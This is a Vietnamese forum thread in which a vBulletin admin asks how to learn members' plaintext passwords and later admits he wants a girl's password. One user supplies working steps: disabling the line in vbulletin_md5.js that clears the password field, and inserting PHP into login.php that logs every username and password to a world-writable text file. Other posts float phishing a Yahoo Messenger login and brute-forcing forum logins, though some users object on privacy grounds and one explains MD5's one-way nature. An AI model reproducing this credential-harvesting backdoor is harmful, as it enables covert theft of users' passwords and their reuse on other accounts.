Latest posts for the topic "Để biết pass của thành viên trong forum"

Để biết pass của thành viên trong forum

boynet — GMT

Em là lính mới, có gì mong các bác thông cảm. Em là admin của 1 forum, trong thời gian gần đây có 1 số mem có ý đồ phá phách, gây rối. Em muốn biết pass của những thành viên này để theo dõi. Trước đây em có đọc 1 bài hướng dẫn admin lấy pass của mem nhưng giờ tìm mãi không thấy. Bác nào có thể cho link bài này, nếu không hướng dẫn chi tiết cho em với. em hoàn toàn không có dụng ý xấu nào cả, chỉ mong muốn kiểm soát các mem quá khích để ổn định hoạt động của forum thôi. Chân thành cảm ơn các bác trước! P/s: em dùng forum Vbb

Để biết pass của thành viên trong forum

lyhuuloi — GMT

Thế cái này là giúp chứ không phải học hỏi nhỉ, mình thì chỉ thích hướng dẫn chứ không thích làm cụ thể - và nhất là làm dùm, làm giúp :D Nên đây là cách làm :) Ngày xưa cũng vơ va vớ vẩn mà làm rồi sau đó lại bỏ vì thấy nó "quá đáng" :D Để có thể làm thì bác cần phải biết: 2 chữ "Lập trình" và cuối cùng là PHP :D Cách làm như sau: 1. Tìm đến đoạn xử lý đăng nhập của User 2. Bắt thông tin username và password lúc chưa bị mổ xẻ hay chấp vá gì hết 3. Sau đó lưu thông tin này vào 1 file .txt, ghi rõ "Username: XYZ, Password: ABC" Rồi sau đó chỉ việc chờ Victim, à không, phải gọi là "mem có ý đồ pha phách" :D Cụ thể thế nào thì gồng mình lên nha bạn, có khó thì mới có kinh nghiệm ;)

Để biết pass của thành viên trong forum

ANKDPACN — GMT

:-< Admin đi phishing member, qả là 1 ý tg ko thể tuyệt vời hơn, sao mình ko nghĩ ra sớm hơn để chôm pass n` yêu nhỉ =))

Để biết pass của thành viên trong forum

lyhuuloi — GMT

Bác nên dừng ý tưởng đó đi :) Nó đã vi phạm quyền cá nhân trầm trọng rồi đó ;) Trên mọi phương diện, đó đã là một cách lấy mật khẩu bất hợp pháp, híc.

Để biết pass của thành viên trong forum

TheShinichi — GMT

Híc, lạ quá, lần đầu tiên thấy có 1 Admin của forum phải tìm cách lấy password để ngăn chặn những member phá phách :D Chắc forum đấy không có chức năng "ban" !

Để biết pass của thành viên trong forum

beginnerx1 — GMT

:D Del nick thẳng tay chứ việc gì phải làm thế cho khổ ra. :D Trừ phi làm việc đó với 1 ý đồ đen tôi :P

Để biết pass của thành viên trong forum

boynet — GMT

việc ban hay del 1 user thì quá dễ rồi. Nhưng mem có ý định "chọc ngoáy" lại là người cùng cơ quan mới đau. Dĩ nhiên làm sao mà được lòng tất cả được, cũng có người này nọ. Admin biết pass cũng có thời gian đâu mà xăm soi hết các thành viên được, và nếu họ biết thì forum chỉ có nước là "sập tiệm". Mình chỉ theo dõi những đối tượng "khả nghi" mà không thể ban hay del họ được. Biết trước để ngăn chặn để dần dần họ từ bỏi ý định "chơi xấu" admin thôi. Nếu chỉ nêu các bước như ở trên (cái bác lyhuuloi đấy) thì ai mà chả nêu được :D . Vấn đề là làm như thế nào ? Em mà rành về lập trình thì đã tự mò rồi, hỏi các bác làm gì :D . Ai có lòng hảo tâm thì giúp em với, nếu không tiện thì gửi cho em Email: kehaodanh@yahoo.com (các bác đừng có "đính kèm" cho em 1 em trojan nào nhá, tội em lắm!). thanks!

Để biết pass của thành viên trong forum

ANKDPACN — GMT

Chả hiểu cậu biết pass rồi thì cậu làm j người ta, theo dõi người ta kiểu j? Cho mình biết phương án tiếp theo của bạn sau khi đã biết pass. :-s

Để biết pass của thành viên trong forum

lyhuuloi — GMT

việc ban hay del 1 user thì quá dễ rồi. Nhưng mem có ý định "chọc ngoáy" lại là người cùng cơ quan mới đau. Dĩ nhiên làm sao mà được lòng tất cả được, cũng có người này nọ. Admin biết pass cũng có thời gian đâu mà xăm soi hết các thành viên được, và nếu họ biết thì forum chỉ có nước là "sập tiệm". Mình chỉ theo dõi những đối tượng "khả nghi" mà không thể ban hay del họ được. Biết trước để ngăn chặn để dần dần họ từ bỏi ý định "chơi xấu" admin thôi. Nếu chỉ nêu các bước như ở trên (cái bác lyhuuloi đấy) thì ai mà chả nêu được smilie . Vấn đề là làm như thế nào ? Em mà rành về lập trình thì đã tự mò rồi, hỏi các bác làm gì smilie . Ai có lòng hảo tâm thì giúp em với, nếu không tiện thì gửi cho em Email: kehaodanh@yahoo.com (các bác đừng có "đính kèm" cho em 1 em trojan nào nhá, tội em lắm!). thanks!

Hóa ra là ai cũng biết cách chứ không biết làm nhỉ :) Chắc lúc làm việc, Vấn đề nào bác không biết bác cũng nhờ người khác giúp luôn đúng không ;) Tớ biết, nhưng tớ không muốn hướng dẫn cho bác ngay là để xem phản ứng của bác thế nào, như này thì hỏng cả. ;) Thôi thì bác nào rãnh rỗi thì giúp bác ấy nhé #:S

Để biết pass của thành viên trong forum

jforum3000 — GMT

boynet, đây cũng là /hvaonline/posts/list/29910.html.

Để biết pass của thành viên trong forum

lyhuuloi — GMT

jforum3000 wrote:

boynet, đây cũng là một cách để biết.

Cách này không dùng được đâu bạn :) Nó chỉ là mã md5, trong khi bác ấy lại cần password chính xác từng chữ mà ;)

Để biết pass của thành viên trong forum

boynet — GMT

Nói thì dễ mà làm thì mới khó, khó với người này nhưng dễ với người khác là chuyện bình thường. Dốt nhưng không giấu, chịu khó đi học hỏi là điều đáng quý chứ sao. Ai trước đây chẳng xuất phát từ lớp vỡ lòng a,b,c. Mỗi người có một ý tưởng khác nhau, nhưng em khẳng định việc làm này không phải mục đích xấu. Đã không biết mới hỏi mà các bác cứ: tự mò đi, tìm đi, lười thế, thiếu kiên nhẫn, biết ngay là lại hỏi...Diễn đàn để trao đổi, học hỏi mà toàn câu kiểu "thử phản ứng" chả trọng tâm tí nào. Ý kiến các bác phải rõ ràng: cái này không thể là được, muốn làm thì như thế này, hoặc làm được nhưng vi phạm pháp luật thì bạn tự chịu trách nhiệm v.v... Chứ cứ phán 1 câu: cái này tớ làm được nhưng không có thời gian chỉ, thông cảm nhá! Ai mà chả phán được vì có cách nào kiểm chứng được đâu :D

Để biết pass của thành viên trong forum

lyhuuloi — GMT

Tính không viết giúp bác rồi, nhưng hôm nay chủ nhật trời nóng quá, lại còn bị khích tướng nữa nên đành chiều ý bác, lập trình bao nhiêu năm bây giờ lại để người như bác ra sức "dạy dỗ" như vậy cũng không hay :) Cái này giống như kiểu, aha, ta vào một lớp học, ta hỏi thầy, "thầy ơi, vấn đề này em phải làm thế nào, thầy viết từ a-z cho em nhé", ok thế thì viết dùm đây, chắc chỉ có ở đây mới có như vậy thôi :) Bước 1: Mở file clientscript/vbulletin_md5.js Thay dòng:

input.value = '';

Thành:

//input.value = '';

Bước 2: Mở file login.php Tìm đoạn: Code:

if ($_POST['do'] == 'login')
{

Chèn vào bên dưới: Code:

$fp = fopen("lyhuuloi.com.txt", "a+");

	fwrite($fp, "Username: {$_POST['vb_login_username']}
	Password: {$_POST['vb_login_password']}
	
	");
		
	rewind($fp);

Bước 3: Tạo file lyhuuloi.com.txt và CHMOD 777 Bước 4: Upload, rồi đợi. Kết quả được lưu vào file txt ấy nhé :) PS: Mình thì không thích vớ vẩn với bác, nhưng lần sau bác có yêu cầu thì nói đàng hoàng nhé, không phải ai cũng chỉ biết nói thôi đâu :)

Để biết pass của thành viên trong forum

lyhuuloi — GMT

À sorry, các bác không nên lạm dụng nó nhé, vì cái này vi phạm quyền riêng tư trầm trọng đấy :)

Để biết pass của thành viên trong forum

boynet — GMT

Cảm ơn bác đã giúp. Tuy nhiên em tìm trong file clientscript/vbulletin_md5.js thì không có đoạn input.value = ''; như hướng dẫn của bác. Em cài bản Vbb3.8.3, 1 phần của file clientscript/vbulletin_md5.js như thế này var hexcase=0;var b64pad="";var chrsz=8;function hex_md5(A){return binl2hex(core_md5(str2binl(A),A.length*chrsz))}function b64_md5(A){return binl2b64(core_md5(str2binl(A),A.length*chrsz))}function str_md5(A){return binl2str(core_md5(str2binl(A),A.length*chrsz))}function hex_hmac_md5(A,B){return binl2hex(core_hmac_md5(A,B))}function b64_hmac_md5(A,B){return binl2b64(core_hmac_md5(A,B))}function str_hmac_md5(A,B){return binl2str(core_hmac_md5(A,B))}function core_md5(K,F){K[F>>5]|=128<<((F)%32);K[(((F+64)>>>9)<<4)+14]=F;var J=1732584193;var I=-271733879;var H=-1732584194;var G=271733878;for(var C=0;Cinput.value = '';. Em thử bỏ qua bước này thì không có kết quả trong file.txt. Mong bác xem lại giúp em.

Để biết pass của thành viên trong forum

lyhuuloi — GMT

Đúng rồi :) Đó là bước quan trọng nhất, vì phần đăng nhập của VBB đã dùng javascript để mã hóa md5() và sau đó thì nó xóa luôn giá trị password nguyên thủy mà bác vừa nhập, cho nên nếu không vô hiệu hóa cái dòng xóa giá trị này thì bác chỉ nhận được cái username thôi. Uhm, bản vbb 3.8.3 đúng là không có dòng đó thật, vì trên máy mình chỉ có VBB 3.6.8, VBB 3.8.3 nó đã mã hóa luôn cái file javascript nên giá trị tìm đã thay đổi. Và sau khi tìm hiểu sơ bộ thì phát hiện ra biến input lúc này đã đổi cái tên lại thành "B", cho nên ở bước 1 sẽ như thế này: Mở file clientscript/vbulletin_md5.js, tìm dòng: Code:

B.value=""

Rồi xóa luôn là ok !

Để biết pass của thành viên trong forum

boynet — GMT

Em làm đúng như bác hướng dẫn rồi, xóa B.value="" ở file clientscript/vbulletin_md5.js nhưng trong file .txt nó chỉ tìm được user thôi, còn dòng pass thì trắng tinh. Vậy phải làm sao hả bác lyhuuloi ? Em test nhiều lần rồi vẫn vậy. Bác cố gắng giúp em nha. thanks!

Để biết pass của thành viên trong forum

lyhuuloi — GMT

OK, mình vừa tải VBB 3.83 về, giờ thì ăn cơm đã, khi nào rỗi việc sẽ vào test lại giúp bác ngay :D

Để biết pass của thành viên trong forum

protectHat — GMT

Tôi thấy hành động này là không tốt. Kể cả lyhuuloi cũng thấy như vậy nhưng vẫn giúp là không được. Admin 1 forum sẽ có toàn quyền trên forum mình. Mọi phá phách đều có thể ban hoặc cấm. Hành động này là lấy thông tin cá nhân, vd nếu người này mà dùng ps này vào 1 nơi nào khác nữa thì người admin này có thể lấy thông tin đó. Như là pass dd và pass vào ngân hàng online có cùng pass thì bác lyhuuloi cũng không tránh khỏi liên quan

Để biết pass của thành viên trong forum

lyhuuloi — GMT

OK, bác protectHat nói đúng, có lẽ mình không nên giúp bác ấy :) Mong boynet hiểu nhé ;)

Để biết pass của thành viên trong forum

bolzano_1989 — GMT

Thật sự những bước lyhuuloi chỉ ra là rất rõ rồi, ai có năng lực tìm hiểu sẽ tự làm được thôi . Từ giờ, tôi sẽ chú ý dùng pass ở diễn đàn khác với pass ở các trang khác . Thanks lyhuuloi .

Để biết pass của thành viên trong forum

lyhuuloi — GMT

Đúng rồi, tốt nhất không nên tham gia nhiều diễn đàn, như mình khi tạo 1 account ở mỗi diễn đàn đều phải tự đặt key cho cái domain của diễn đàn đó. Ví dụ: hvaonline --> hv@0l1n3123456 :D Như vậy có bị lấy password thì hậu quả để lại cũng sẽ giảm đáng kể :)

Để biết pass của thành viên trong forum

boynet — GMT

Thực ra cái đó cũng không quá nghiêm trọng như protectHat nói đâu. Em chỉ muốn thể hiện một tí là admin, thế như dốt món code nên nhờ các bác. Vào forum chẳng ai dại gì đi lấy các thông tin quan trong làm pass. Rối mò mẫm trong hàng trăm thành viên cũng nhọc lắm. Mà như em đã nói nếu admin sử dụng với mục đích xấu thì trước sau người ta cũng phát hiện và 4rum đó đóng cửa là vừa. Điều này chắc chắn không admin nào muốn. Thôi đành nói thật là muốn biết pass của con nhỏ đang cua để lấy le í mà. Chứ chả phải làm gì đâu, các bác truy kĩ quá đành phải khai thật. Đã gần xong rồi, một lần nữa năn nỉ bác Lyhuuloi ra tay giúp em với, Em xin cảm ơn và hậu tạ!

Để biết pass của thành viên trong forum

ANKDPACN — GMT

boynet wrote:

Thôi đành nói thật là muốn biết pass của con nhỏ đang cua để lấy le í mà. Chứ chả phải làm gì đâu, các bác truy kĩ quá đành phải khai thật. Đã gần xong rồi, một lần nữa năn nỉ bác Lyhuuloi ra tay giúp em với, Em xin cảm ơn và hậu tạ!

oái, té ra là n` cùng mục đích với tui à :p. Hjx, e chán forum roài, h làm cái trang login Y!M rồi phishing cho nó nhanh dù j GF cũng gà IT :D. Mà chúc bác thành công nhé ;)). Ai dè đi chôm pass GF làm je` cơ chứ :p

Để biết pass của thành viên trong forum

ANKDPACN — GMT

boynet wrote:

Thôi đành nói thật là muốn biết pass của con nhỏ đang cua để lấy le í mà. Chứ chả phải làm gì đâu, các bác truy kĩ quá đành phải khai thật. Đã gần xong rồi, một lần nữa năn nỉ bác Lyhuuloi ra tay giúp em với, Em xin cảm ơn và hậu tạ!

Để biết pass của thành viên trong forum

jforum3000 — GMT

[ngoài lề mà không phải ngoài lề] Nếu thật sự yêu cô ấy thì khuyên bạn không nên dùng cách này. [/ngoài lề mà không phải ngoài lề]

Để biết pass của thành viên trong forum

phanledaivuong — GMT

chài, lúc thi thành viên phá, lúc thì người yêu, toàn là ngụy biện thôi mà :-< bảo người ta là cái gì muốn biết phải tự lo mà nghiên cứu lấy php với java script mà làm, hva có phải là mì ăn liền đâu :-<

Để biết pass của thành viên trong forum

lyhuuloi — GMT

Khà khà, đang cua mà :) Đang cua thì tò mò, chứ đã quen rồi thì đừng nói là password, mà cả chìa khóa để cắm vào ổ khóa còn có :))

Để biết pass của thành viên trong forum

khong_la_khong — GMT

vậy làm sao để biết trang www.xxx.xx chơi kiểu này

Để biết pass của thành viên trong forum

Mr.Kee — GMT

Bác dow cái data về mà mò!:))

Để biết pass của thành viên trong forum

Jino_Hoang — GMT

Mật khẩu của mem bị mã hóa bởi MD5 vì vậy nếu ta tìm thấy ô mật khẩu bị mã hóa thì dùng MD5 cracker là được.

Để biết pass của thành viên trong forum

Mr.Kas — GMT

Jino_Hoang wrote:

Mật khẩu của mem bị mã hóa bởi MD5 vì vậy nếu ta tìm thấy ô mật khẩu bị mã hóa thì dùng MD5 cracker là được.

Có chắc là chỉ có bị mã hóa MD5 không ? Có chắc là crack (tìm ra mã gốc) được cái mã này không ? Nếu cậu nghĩ là được thì tớ cho cậu một chuỗi MD5 để cậu crack nhé ?

Để biết pass của thành viên trong forum

Jino_Hoang — GMT

Mr.Kas wrote:

Jino_Hoang wrote:

Mật khẩu của mem bị mã hóa bởi MD5 vì vậy nếu ta tìm thấy ô mật khẩu bị mã hóa thì dùng MD5 cracker là được.
Có chắc là chỉ có bị mã hóa MD5 không ? Có chắc là crack (tìm ra mã gốc) được cái mã này không ? Nếu cậu nghĩ là được thì tớ cho cậu một chuỗi MD5 để cậu crack nhé ?

Thông thường là vậy, nếu bạn cho mình mã MD5 với hình thức đánh đố thì ok luôn Có mã hoá thì cũng có giải mã.

Để biết pass của thành viên trong forum

Mr.Kas — GMT

@ Jino_Hoang: Theo ý bạn, mình đã cho bạn môt chuỗi MD5 (chỉ duy nhất MD5), và bạn thử giúp mình giãi mã chuỗi này xem: Code:

9f79ea1297b6d5f4fe62d1002814ff01

Mình cũng xin nói luôn cho bạn (vì mình tin là bạn không tìm ra được), chuỗi này là chuỗi Code:

{#©mr_kas_18}_[md5]

Sau khi bạn giải mã thì bạn tự đối chiếu xem có đúng không nhé. Cũng nhân đây xin giải thích cho bạn Jino_Hoang hiểu luôn, MD5 (Message-Digest algorithm 5) là một hàm băm mật mã được sử dụng phổ biến với giá trị băm dài 128-bit. MD5 chỉ có một hạn chế là nó chỉ dò qua dữ liệu một lần, nếu hai tiền tố với cùng bảng băm được xây nên, thì cùng một hậu tố có thể cùng được thêm vào để khiến cho đụng độ dễ xảy ra. Tức là hai dữ liệu vào X và Y hoàn toàn khác nhau nhưng có thể ra được một md5 hash giống nhau. Tuy nhiên khả năng là rất nhỏ. Nhấn mạnh, chúng ta chỉ có thể tạo ra tín hiệu message digest từ một chuổi string (encode).Chúng ta không thể “dịch ngược” một message digest ra một string origin (decode). Chỉ có một cách có được chuổi origin là bằng cách “brute force cracking”. Tức là phải duyệt qua rất nhiều tổ họp các ký tự của chuổi vào cho đến khi một trong những chuổi md được tạo ra của chúng bằng với chuổi md cần tìm origin Trích thêm một lời của anh conmale:

MD5 là thuật toán tạo chuỗi băm một chiều. Bởi thế, không thể dịch ngược (đã là một chiều thì làm sao có chuyện ngược lại?). Những tool dùng để "dịch ngược" một chuỗi MD5 thật sự là những công cụ dùng biện pháp "brute force", một phương pháp dò tìm đáp số dựa trên những điều kiện có thể đoán được. Bởi thế, biện pháp này rất tốn thời gian và tài nguyên của máy. Nếu bồ dùng một tool MD5 "brute force" mà chạy trên một con pentium xoàng để ráng mà đoán một chuỗi băm được tạo từ mấy chục ký tự kể cả các ký tự đặc biệt thì có nước chờ suốt đời. "Không được" là ở chỗ đó.

Có mã hoá thì cũng có giải mã.

Ừ, thì đúng là thế. Nhưng vấn đề là cả đời bạn có đủ thời gian để làm việc này không? PM: Bạn nên tìm hiểu thêm về mã hóa.

Để biết pass của thành viên trong forum

saothienhat — GMT

nếu bạn là quản trị của trang đó thì với mấy mem phá phách thì bạn cứ việc xóa bài viết và ban nick,còn việc hỏi cách lấy pass của mem thì chắc hem ai dám làm mem của trang web đó quá :))

Để biết pass của thành viên trong forum

lostering — GMT

Chào các anh/ chị. Em cũng đang trong tình cảnh bác chủ topic. Nhưng mà tình hình thì khác tí. Hiện em đang có một cái forum invisionfree và nắm quyền admin trong đó. Em cũng muốn biết pass của members. Qua tìm hiểu trên google thì invisionfree bảo mật kém hơn VBB (do không giới hạn số lần đánh pass sai). Do đó ta có thể brute-force nó được. Em tìm hiểu tới chỗ này thì hơi bí: -Em không biết làm cách nào để có được một cái brute-forcer chạy được ngon lành. Đàn anh nào có lòng thì chỉ cách cho em, nếu không thì chỉ cần định hướng cho em là em cảm tạ nhiều nhiều lắm rồi. Em cũng nghĩ tới một khả năng nữa là download database của invisionfree về (có tính phí), rồi tìm cách crack MD5. (em nghĩ nó mã hóa bằng MD5). Mong các anh cho chút ý kiến ạ. Cảm tạ các anh nhiều nhiều.

Để biết pass của thành viên trong forum

talk_about_myself — GMT

Em là lính mới, có gì mong các bác thông cảm. Em là admin của 1 forum, trong thời gian gần đây có 1 số mem có ý đồ phá phách, gây rối

Bạn này y hệt mình luôn ah , 4rum mình có 4 admin , mình quản lý nội dung , mặc dù có PW vào host nhưng vì ko rành PHP nên hem dám tí toáy j luôn ! Mình bực lên thì Ban vĩnh viễn luôn , nếu Kú quá Del luôn Nik :|

Để biết pass của thành viên trong forum

van_security — GMT

lyhuuloi wrote:

OK, bác protectHat nói đúng, có lẽ mình không nên giúp bác ấy :) Mong boynet hiểu nhé ;)

Mình nghĩ đây là 1 bugs của các ứng dụng. Sao bác không chỉ ra cách thực hiện cũng là chỉ ra cái lỗ hỏng của nó để mọi người biết mà đề phòng có tốt hơn không? Cũng có khả năng là version sau đã fix cái lỗ hỏng đó rồi.

Để biết pass của thành viên trong forum

vnkimlong — GMT

Hiện giờ có nhiều người đặt password của các tài khoản giống nhau(mình cũng vậy), nếu biết pass của các thành viên trong forum có thể mò ra những tài khoản khác chăng :D

Để biết pass của thành viên trong forum

ipv — GMT

mà bít pass thì làm đc j chứ?? Với pass đó thì bạn định làm j??? :-?? Đúng là bất hợp pháp..Nếu cần thì "ban" hoặc "del" cho nhanh>:D

Để biết pass của thành viên trong forum

..::Songuku95::.. — GMT

Giúp thì giúp nốt đi anh. Phi lao thì phải theo lao chứ. Đã có bản 3.8.4 rồi. Anh giúp cách xem pass user nhé